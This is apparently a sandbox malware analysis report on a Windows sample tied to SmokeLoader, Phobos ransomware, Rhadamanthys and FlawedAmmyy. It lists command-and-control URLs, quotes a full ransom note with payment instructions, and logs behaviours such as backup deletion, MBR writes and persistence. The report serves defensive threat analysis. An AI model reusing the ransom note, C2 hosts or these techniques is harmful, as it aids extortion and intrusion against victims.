ammyyadmin | 6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb

Resubmissions

07-09-2023 05:09

230907-ftmydaef97 10

07-09-2023 04:47

230907-feqeysef2v 10

Analysis

max time kernel
300s
max time network
300s
platform
windows10-1703_x64
resource
win10-20230831-en
resource tags

arch:x64arch:x86image:win10-20230831-enlocale:en-usos:windows10-1703-x64system
submitted
07-09-2023 04:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe
Size

833KB
MD5

17688f03f125bb494dc7f304b8936221
SHA1

7fadc66ba11a5b3c4582f4d9b5b245801ccf918a
SHA256

6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb
SHA512

1636d32e5a59c5c3577d0dc5ecf7dbccc22cc0ce2087889974903257d500e694d2cee4218c17ddba747c4b59ea4f811889837883b40cd009c1463cdc21f65a06
SSDEEP

12288:Ib/bL1cEYZpFQOT4KpMT+msoH985+3wAFn6DQnbu7L3SpiQXYIOnUfvDrD8FEsim:WzLmQsI85mn6DQDYpmv8FEyuOGLU

Score

10^/10

ammyyadmin flawedammyy phobos rhadamanthys smokeloader backdoor bootkit collection evasion persistence ransomware rat spyware stealer trojan

Malware Config

Extracted

Family

smokeloader

Version

2022

http://serverxlogs21.xyz/statweb255/

http://servxblog79.xyz/statweb255/

http://demblog289.xyz/statweb255/

http://admlogs77x.online/statweb255/

http://blogxstat38.xyz/statweb255/

http://blogxstat25.xyz/statweb255/

rc4.i32

Extracted

Path

C:\info.hta

Ransom Note

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'> <html> <head> <meta charset='windows-1251'> <title>cartilage</title> <HTA:APPLICATION ICON='msiexec.exe' SINGLEINSTANCE='yes' SysMenu="no"> <script language='JScript'> window.moveTo(50, 50); window.resizeTo(screen.width - 100, screen.height - 100); </script> <style type='text/css'> body { font: 15px Tahoma, sans-serif; margin: 10px; line-height: 25px; background: #C6B5C4; } img { display:inline-block; } .bold { font-weight: bold; } .mark { background: #B5CC8E; padding: 2px 5px; } .header { text-align: center; font-size: 30px; line-height: 50px; font-weight: bold; margin-bottom:20px; } .info { background: #e6ecf2; border-left: 10px solid #B58CB2; } .alert { background: #FFE4E4; border-left: 10px solid #FFA07A; } .private { border: 1px dashed #000; background: #FFFFEF; } .note { height: auto; padding-bottom: 1px; margin: 15px 0; } .note .title { font-weight: bold; text-indent: 10px; height: 30px; line-height: 30px; padding-top: 10px; } .note .mark { background: #A2A2B5; } .note ul { margin-top: 0; } .note pre { margin-left: 15px; line-height: 13px; font-size: 13px; } .footer { position:fixed; bottom:0; right:0; text-align: right; } </style> </head> <body> <div class='header'> <img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAQAAAAAYLlVAAAABGdBTUEAALGPC/xhBQAAACBjSFJNAAB6JQAAgIMAAPn/AACA6QAAdTAAAOpgAAA6mAAAF2+SX8VGAAAAAmJLR0QA/4ePzL8AAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfjAwwMJwSFwIn8AAADNklEQVRo3u2ZTUhUURTHfzozmprmZ1pYEmkfJNEmiwwkSEyFECIQpEUboYhqFYHQXlcti9rUKldWBEUiuQpbtDDNzD5G8qM0HRXLRtO5LdJx3puPd++8+xyIztm88zgf/3veufeee18SdimDI1RxnL0U4gbAzxhDdPGCfpZs+49JWTTyFB8iAq8wTju1pDgXvopOliIGX+d57rHPieBuLvLNIvgaD1KvP/x1FiTDCwQTNOkFcJVfCuEFgq+c0he+minF8AJBH2WRnCUph8/nIZVhb2d5w1smEbjYSTn7SQ/TucsFlnWkPxBW6Xc4RkbIoHKooSNshsxRbT98Eb0mtyM04oqgmR6hUNvtrwrnWDa4nOVMVF0XLfw2aPuosBfezQPTmNpiVtFmnpj0W+wBKMFrcPeJ3RYWNfwwWHSSZgdAHX6Du5uWFpl0myqm1KiQrASgnNQQaZFOS4t5nhvkAnbZAbDHIE0wIGHzmsUQKdXkQwlACtsN8ijfJay8zBjkovgBbCLPlAG/hNUcswa5IH4Ayasdzxr5pBbWRRYMstGHYg04QAkH4FbQFSwTCKbdI7mzWVipbMceKtiCCFqO0OeY1caRbAaKOcgOCpQ+WWTyM8EwvfjkTfJoYZDFONqwaPyTHs7LbktlPNMYep2XuE22dfhsHjkS/i+3Wn/SK2EdoE72UeuyGH8rxbbLLjqlkRlb4TAzDo5fIJiOvRTnR+ju9VJuwveC/wASDsD+2h5KUyyQTVZiALzjFt3MsY16mtmqx2mt9BbUw4EQuzpGpVcCLQB8nDBZXmJFDoCeInzFS9ObxwzLmeoBMGA4/QBM4t1IAOHXDi7Zqwg9ACrCWotS8xnQWQCHOGsafzOFOhzLT8NxmoI3RZncULjG1ARA8DHYupxUucbUtxd4ghnw4JI30wdARHneMABx0j8FYD3xCkdefQByKFl9KsOjy6nKNBR0cZRCTjOk1JhrBCCY5r3pZtSS9bZkueSqmljVgPoPDa0Algk4HD8QG8AXph0G8Dk2AC89DgPosFKodvR83G/dtiRzTevtUChP0SCTpBQuM+bI6Bvk51gl96X/FFvzCh9oW0v+H2zO2tYtz/EgAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDE5LTAzLTEyVDEyOjM5OjA0KzAwOjAwG6lIYwAAACV0RVh0ZGF0ZTptb2RpZnkAMjAxOS0wMy0xMlQxMjozOTowNCswMDowMGr08N8AAAAASUVORK5CYII='> <div>All your files have been encrypted!</div> </div> <div class='bold'>All your files have been encrypted due to a security problem with your PC.</div> <div class='bold'>If you want to restore them, write us to the e-mail <span class='mark'>[email protected]</span></div> <div class='bold'>Or write us to the Tox: <span class='mark'>78E21CFF7AA85F713C1530AEF2E74E62830BEE77238F4B0A73E5E3251EAD56427BF9F7A1A074</span></div> <div class='bold'>Write this ID in the title of your message <span class='mark'>F3547DDF-3483</span></div> <div> You have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the tool that will decrypt all your files. </div> <div class='note info'> <div class='title'>Free decryption as guarantee</div> <ul>Before paying you can send us up to 3 files for free decryption. The total size of files must be less than 4Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) </ul> </div> <div class='note info'> <div class='title'>How to obtain Bitcoins</div> <ul> The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. <br><a href='https://localbitcoins.com/buy_bitcoins'>https://localbitcoins.com/buy_bitcoins</a> <br> Also you can find other places to buy Bitcoins and beginners guide here: <br><a href='http://www.coindesk.com/information/how-can-i-buy-bitcoins/'>http://www.coindesk.com/information/how-can-i-buy-bitcoins/</a> </ul> </div> <div class='note alert'> <div class='title'>Attention!</div> <ul> <li>Do not rename encrypted files.</li> <li>Do not try to decrypt your data using third party software, it may cause permanent data loss.</li> <li>Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.</li> </ul> </div> </body> </html>

Emails

class='mark'>[email protected]</span></div>

URLs

http://www.w3.org/TR/html4/strict.dtd'>

Extracted

Path

C:\Users\Admin\Desktop\info.hta

Ransom Note

All your files have been encrypted! All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail [email protected] Or write us to the Tox: 78E21CFF7AA85F713C1530AEF2E74E62830BEE77238F4B0A73E5E3251EAD56427BF9F7A1A074 Write this ID in the title of your message F3547DDF-3483 You have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the tool that will decrypt all your files. Free decryption as guarantee Before paying you can send us up to 3 files for free decryption. The total size of files must be less than 4Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) How to obtain Bitcoins The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. https://localbitcoins.com/buy_bitcoins Also you can find other places to buy Bitcoins and beginners guide here: http://www.coindesk.com/information/how-can-i-buy-bitcoins/ Attention! Do not rename encrypted files. Do not try to decrypt your data using third party software, it may cause permanent data loss. Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Emails

[email protected]

Signatures

Ammyy Admin
Remote admin tool with various capabilities.
rat ammyyadmin

AmmyyAdmin payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\2DDC.tmp\svchost.exe	family_ammyyadmin
C:\Users\Admin\AppData\Local\Temp\2DDC.tmp\svchost.exe	family_ammyyadmin

Detect rhadamanthys stealer shellcode 6 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2504-14-0x0000000003090000-0x0000000003490000-memory.dmp	family_rhadamanthys
behavioral2/memory/2504-16-0x0000000003090000-0x0000000003490000-memory.dmp	family_rhadamanthys
behavioral2/memory/2504-15-0x0000000003090000-0x0000000003490000-memory.dmp	family_rhadamanthys
behavioral2/memory/2504-17-0x0000000003090000-0x0000000003490000-memory.dmp	family_rhadamanthys
behavioral2/memory/2504-29-0x0000000003090000-0x0000000003490000-memory.dmp	family_rhadamanthys
behavioral2/memory/2504-31-0x0000000003090000-0x0000000003490000-memory.dmp	family_rhadamanthys

FlawedAmmyy RAT
Remote-access trojan based on leaked code for the Ammyy remote admin software.
trojan flawedammyy
Phobos
Phobos ransomware appeared at the beginning of 2019.
ransomware phobos
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs

Processes:

6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exeE9B2.exe

description	pid	process	target process
PID 2504 created 3184	2504	6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe	Explorer.EXE
PID 4288 created 3184	4288	E9B2.exe	smss.exe
PID 4288 created 3184	4288		smss.exe
PID 4288 created 3184	4288		smss.exe
PID 4288 created 3184	4288		smss.exe
PID 4288 created 3184	4288		smss.exe
PID 4288 created 3184	4288		smss.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid process

3512 bcdedit.exe
3560 bcdedit.exe
672 bcdedit.exe
3560 bcdedit.exe
Renames multiple (459) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Deletes backup catalog 3 TTPs 2 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command and Scripting Interpreter
T1059

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

wbadmin.exewbadmin.exe

pid process

4632 wbadmin.exe
4940 wbadmin.exe
Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs 2 IoCs
evasion

Windows Service
T1543.003

Processes:

netsh.exenetsh.exe

pid process

808 netsh.exe
1412 netsh.exe
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489
Deletes itself 1 IoCs

Processes:

certreq.exe

pid process

1872 certreq.exe

pid	process
3512	bcdedit.exe
3560	bcdedit.exe
672	bcdedit.exe
3560	bcdedit.exe

pid	process
4632	wbadmin.exe
4940	wbadmin.exe

pid	process
808	netsh.exe
1412	netsh.exe

pid	process
1872	certreq.exe

Drops startup file 3 IoCs

Processes:

_cG.exe

description	ioc	process
File created	\??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\_cG.exe	_cG.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	_cG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id[F3547DDF-3483].[[email protected]].8base	_cG.exe

Executes dropped EXE 14 IoCs

Processes:

_cG.exey853e.exe_cG.exey853e.exe_cG.exe_cG.exeACF4.exeACF4.exeACF4.exeB283.exeBE8A.exeE9B2.exesmss.exeB283.exe

pid	process
1224	_cG.exe
1232	y853e.exe
4468	_cG.exe
5024	y853e.exe
5052	_cG.exe
3796	_cG.exe
3356	ACF4.exe
4512	ACF4.exe
1740	ACF4.exe
4812	B283.exe
316	BE8A.exe
4288	E9B2.exe
1908	smss.exe
1740	B283.exe

Loads dropped DLL 2 IoCs

Processes:

BE8A.exesmss.exe

pid process

316 BE8A.exe
2864 smss.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
316	BE8A.exe
2864	smss.exe

Accesses Microsoft Outlook profiles 1 TTPs 9 IoCs

collection

Email Collection

T1114

Processes:

certreq.exeexplorer.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook	certreq.exe
Key opened	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	certreq.exe
Key opened	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	certreq.exe
Key opened	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook	certreq.exe
Key opened	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook	certreq.exe
Key opened	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	certreq.exe
Key opened	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

_cG.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Windows\CurrentVersion\Run\_cG = "C:\\Users\\Admin\\AppData\\Local\\_cG.exe"	_cG.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\_cG = "C:\\Users\\Admin\\AppData\\Local\\_cG.exe"	_cG.exe

Drops desktop.ini file(s) 64 IoCs

Processes:

_cG.exe

description	ioc	process
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	_cG.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	_cG.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini	_cG.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	_cG.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	_cG.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	_cG.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	_cG.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	_cG.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini	_cG.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini	_cG.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	_cG.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	_cG.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	_cG.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	_cG.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	_cG.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	_cG.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI	_cG.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini	_cG.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini	_cG.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini	_cG.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	_cG.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini	_cG.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	_cG.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini	_cG.exe
File opened for modification	C:\$Recycle.Bin\S-1-5-21-3540700546-2554825161-2349363825-1000\desktop.ini	_cG.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	_cG.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini	_cG.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	_cG.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	_cG.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	_cG.exe
File opened for modification	C:\Program Files\desktop.ini	_cG.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini	_cG.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	_cG.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	_cG.exe
File opened for modification	C:\Program Files (x86)\Common Files\Microsoft Shared\Stationery\Desktop.ini	_cG.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	_cG.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	_cG.exe
File opened for modification	C:\Users\Public\desktop.ini	_cG.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	_cG.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	_cG.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini	_cG.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	_cG.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini	_cG.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini	_cG.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	_cG.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	_cG.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	_cG.exe
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-3540700546-2554825161-2349363825-1000\desktop.ini	_cG.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu Places\desktop.ini	_cG.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	_cG.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	_cG.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	_cG.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	_cG.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini	_cG.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini	_cG.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini	_cG.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini	_cG.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini	_cG.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	_cG.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini	_cG.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	_cG.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	_cG.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini	_cG.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini	_cG.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1542.003

Processes:

smss.exe

description ioc process

File opened for modification \??\PhysicalDrive0 smss.exe
Drops file in System32 directory 1 IoCs

Processes:

svchost.exe

description ioc process

File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx svchost.exe

description	ioc	process
File opened for modification	\??\PhysicalDrive0	smss.exe

description	ioc	process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx	svchost.exe

Suspicious use of SetThreadContext 7 IoCs

Processes:

6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe_cG.exey853e.exe_cG.exeACF4.exe

description	pid	process	target process
PID 4104 set thread context of 2504	4104	6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe	6a14114aa3bebe58ae76c66e7688f77a0e0e031cf048004f6bb670aab6344eeb.exe
PID 1224 set thread context of 4468	1224	_cG.exe	_cG.exe
PID 1232 set thread context of 5024	1232	y853e.exe	y853e.exe
PID 5052 set thread context of 3796	5052	_cG.exe	_cG.exe
PID 3356 set thread context of 1740	3356	ACF4.exe	ACF4.exe
PID 4288 set thread context of 1044	4288		smss.exe
PID 4812 set thread context of 1740	4812		B283.exe

Drops file in Program Files directory 64 IoCs

Processes:

_cG.exe

description	ioc	process
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\vlc.mo	_cG.exe
File created	C:\Program Files\7-Zip\Lang\co.txt.id[F3547DDF-3483].[[email protected]].8base	_cG.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019XC2RVL_MAKC2R-pl.xrm-ms.id[F3547DDF-3483].[[email protected]].8base	_cG.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_SubTrial-ppd.xrm-ms	_cG.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\Assets\Sounds\Nudge.wma	_cG.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\images\themeless\web_documentcloud_logo.png.id[F3547DDF-3483].[[email protected]].8base	_cG.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected]	_cG.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp5-ul-phn.xrm-ms.id[F3547DDF-3483].[[email protected]].8base	_cG.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-256_altform-unplated.png	_cG.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsAppList.scale-200.png	_cG.exe
File opened for modification	C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui	_cG.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-actions_zh_CN.jar	_cG.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxA-Exchange.scale-150.png	_cG.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\mashupcompression.dll	_cG.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.contrast-white_scale-80.png.id[F3547DDF-3483].[[email protected]].8base	_cG.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\FrameworkList.xml.id[F3547DDF-3483].[[email protected]].8base	_cG.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\control\libntservice_plugin.dll	_cG.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\AppPackageBadgeLogo.scale-125_contrast-black.png	_cG.exe
File opened for modification	C:\Program Files\Common Files\System\wab32res.dll	_cG.exe
File created	C:\Program Files\Microsoft Office\root\Client\api-ms-win-core-file-l1-2-0.dll.id[F3547DDF-3483].[[email protected]].8base	_cG.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\sfodbc.did	_cG.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\animations\OneNoteFRE_CreateNotes_LTR_Phone.mp4	_cG.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\de-de\ui-strings.js.id[F3547DDF-3483].[[email protected]].8base	_cG.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\zh-cn_get.svg	_cG.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.httpcomponents.httpclient_4.2.6.v201311072007.jar	_cG.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\psfont.properties.ja	_cG.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\contrast-white\SmallTile.scale-125.png	_cG.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-crt-private-l1-1-0.dll	_cG.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\9434_24x24x32.png	_cG.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libmp4_plugin.dll.id[F3547DDF-3483].[[email protected]].8base	_cG.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fi-fi\ui-strings.js.id[F3547DDF-3483].[[email protected]].8base	_cG.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\hr-hr\ui-strings.js.id[F3547DDF-3483].[[email protected]].8base	_cG.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\contrast-white\LargeTile.scale-200.png	_cG.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Res.dll.id[F3547DDF-3483].[[email protected]].8base	_cG.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\PeopleAppList.targetsize-40.png	_cG.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\es-es\ui-strings.js.id[F3547DDF-3483].[[email protected]].8base	_cG.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ja-jp\ui-strings.js	_cG.exe
File created	C:\Program Files\Java\jre1.8.0_66\bin\jp2iexp.dll.id[F3547DDF-3483].[[email protected]].8base	_cG.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProXC2RVL_KMS_ClientC2R-ul-oob.xrm-ms.id[F3547DDF-3483].[[email protected]].8base	_cG.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\6100_20x20x32.png	_cG.exe
